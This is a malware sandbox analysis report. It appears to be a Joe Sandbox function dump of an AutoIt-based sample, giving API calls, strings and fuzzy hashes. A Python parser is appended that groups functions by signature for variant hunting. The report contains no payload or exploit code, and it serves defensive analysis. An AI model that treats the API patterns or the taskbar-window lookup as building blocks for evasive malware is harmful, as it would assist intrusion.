                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 3182216644-0
                                                                              • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                              • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                                                              • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                                                              • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower
                                                                              • String ID: $8'I
                                                                              • API String ID: 2358735015-3608026889
                                                                              • Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                              • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                              • Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
                                                                              • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                              APIs
                                                                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                                                              • String ID: AutoIt3GUI$Container
                                                                              • API String ID: 3380330463-3941886329
                                                                              • Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                              • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                                                              • Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
                                                                              • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00409A61
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: 0vH
                                                                              • API String ID: 1143807570-3662162768
                                                                              • Opcode ID: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                                                                              • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                                                              • Opcode Fuzzy Hash: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
                                                                              • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HH$HH
                                                                              • API String ID: 0-1787419579
                                                                              • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                              • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                                                              • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                                                              • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                                                                              • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                              • Opcode Fuzzy Hash: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
                                                                              • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: '
                                                                              • API String ID: 3850602802-1997036262
                                                                              • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                              • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                              • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                              • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
• Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
• Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
• Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
• Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
• Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 004515DA
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
• Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
• Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
APIs
• Sleep.KERNEL32(00000000), ref: 00474833
• GlobalMemoryStatusEx.KERNEL32 ref: 00474846
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
• Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
• Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
• Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
• Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
• Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
• Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
• Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
Similarity
• API ID: InternetOpen
• String ID: <local>
• API String ID: 2038078732-4266983199
• Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
• Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
• Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
• Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
• Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
• Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
• Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
Similarity
• API ID: MessageSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 455545452-1403004172
• Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
• Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
• Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
• Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• wsprintfW.USER32 ref: 004560E9
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
• API String ID: 1262938277-328681919
• Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
• Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
• Opcode Fuzzy Hash: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
• Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
• Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
• Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
• Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
• PostMessageW.USER32(00000000), ref: 00442247
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                              • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                              • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                              • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                              APIs
                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Message_doexit
                                                                              • String ID: AutoIt$Error allocating memory.
                                                                              • API String ID: 1993061046-4017498283
                                                                              • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                              • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                              • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                              • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E
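The blocks above are the plain-text form of the report's per-function dump: each one lists the resolved API calls with their argument strings and code addresses (FindWindowW.USER32(Shell_TrayWnd,...) at 00442240, the Sleep call reached through subcall 00436272, MessageBoxW with the "AutoIt" caption), followed by the similarity keys (API ID, String ID, API String ID, Opcode ID, fuzzy hashes). Two of the blocks carry the same API String ID 529655941-2988720461 under different Opcode IDs, which is the pivot an analyst uses to find variants of one function across samples: the API/string signature stays stable while the exact opcode hash does not. Shell_TrayWnd is the window class of the Explorer taskbar, so the first argument of a FindWindow call is worth pulling out on its own. The Python below is an added example, not Joe Sandbox code and not part of the report: it parses this text form into records and groups them by API String ID. The sample input is excerpted from the lines above; the record and function names are my own.

```python
"""Parse the plain-text function dump of a Joe Sandbox report and pivot on its IDs.

Added example: the dataclass/function names are this example's own, not the
report's or the sandbox's API. SAMPLE is excerpted from the report text above.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

# One API call line, with or without an argument list, optionally nested in a subcall.
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)

# Similarity keys we keep; "String ID" is handled separately because it is '$'-joined.
KEYS = {
    "API ID": "api_id",
    "API String ID": "api_string_id",
    "Opcode ID": "opcode_id",
    "Instruction Fuzzy Hash": "fuzzy_hash",
}


@dataclass
class Call:
    api: str
    module: str
    args: list[str]
    ref: str                  # address of the call instruction
    parent: str | None = None  # set when the call sits inside a "Part of subcall" entry


@dataclass
class FuncEntry:
    calls: list[Call] = field(default_factory=list)
    api_id: str = ""
    strings: list[str] = field(default_factory=list)
    api_string_id: str = ""
    opcode_id: str = ""
    fuzzy_hash: str = ""


def parse_function_dump(text: str) -> list[FuncEntry]:
    """Split the dump into per-function records; a new record starts at each 'APIs' header."""
    entries: list[FuncEntry] = []
    cur: FuncEntry | None = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        if line == "APIs":
            cur = FuncEntry()
            entries.append(cur)
            continue
        if cur is None:  # leading fragment whose 'APIs' header was cut off
            cur = FuncEntry()
            entries.append(cur)
        m = CALL_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            cur.calls.append(Call(m["api"], m["module"], args, m["ref"], m["parent"]))
            continue
        key, _, value = line.partition(": ")
        if key == "String ID":
            cur.strings = value.split("$")
        elif key in KEYS:
            setattr(cur, KEYS[key], value)
    return entries


def group_by_api_string_id(entries: list[FuncEntry]) -> dict[str, list[FuncEntry]]:
    """Functions sharing an API String ID are variants of the same API/string behaviour."""
    groups: dict[str, list[FuncEntry]] = defaultdict(list)
    for e in entries:
        if e.api_string_id:
            groups[e.api_string_id].append(e)
    return dict(groups)


def find_calls(entries: list[FuncEntry], api: str) -> list[Call]:
    return [c for e in entries for c in e.calls if c.api == api]


def window_classes_looked_up(entries: list[FuncEntry]) -> list[str]:
    """First argument of every FindWindowA/W call: the window class the code searches for."""
    calls = find_calls(entries, "FindWindowW") + find_calls(entries, "FindWindowA")
    return sorted({c.args[0] for c in calls if c.args})


# Constructed input: lines excerpted from the report blocks above.
SAMPLE = """\
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
• Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
• PostMessageW.USER32(00000000), ref: 00442247
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
Strings
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
• Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
  • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
Strings
Memory Dump Source
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
• Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E
"""

if __name__ == "__main__":
    parsed = parse_function_dump(SAMPLE)
    for sid, group in group_by_api_string_id(parsed).items():
        print(sid, "->", [g.opcode_id[:8] for g in group])
    print("window classes:", window_classes_looked_up(parsed))
```

Running this on the excerpt groups the two FindWindowW/PostMessageW variants under 529655941-2988720461 (opcode IDs 62d1e1a0... and d3682f88...) and the MessageBoxW function under 1993061046-4017498283, and reports Shell_TrayWnd as the only window class looked up. To pivot across samples, feed each report's dump through the same parser and compare the API String ID sets rather than the Opcode IDs.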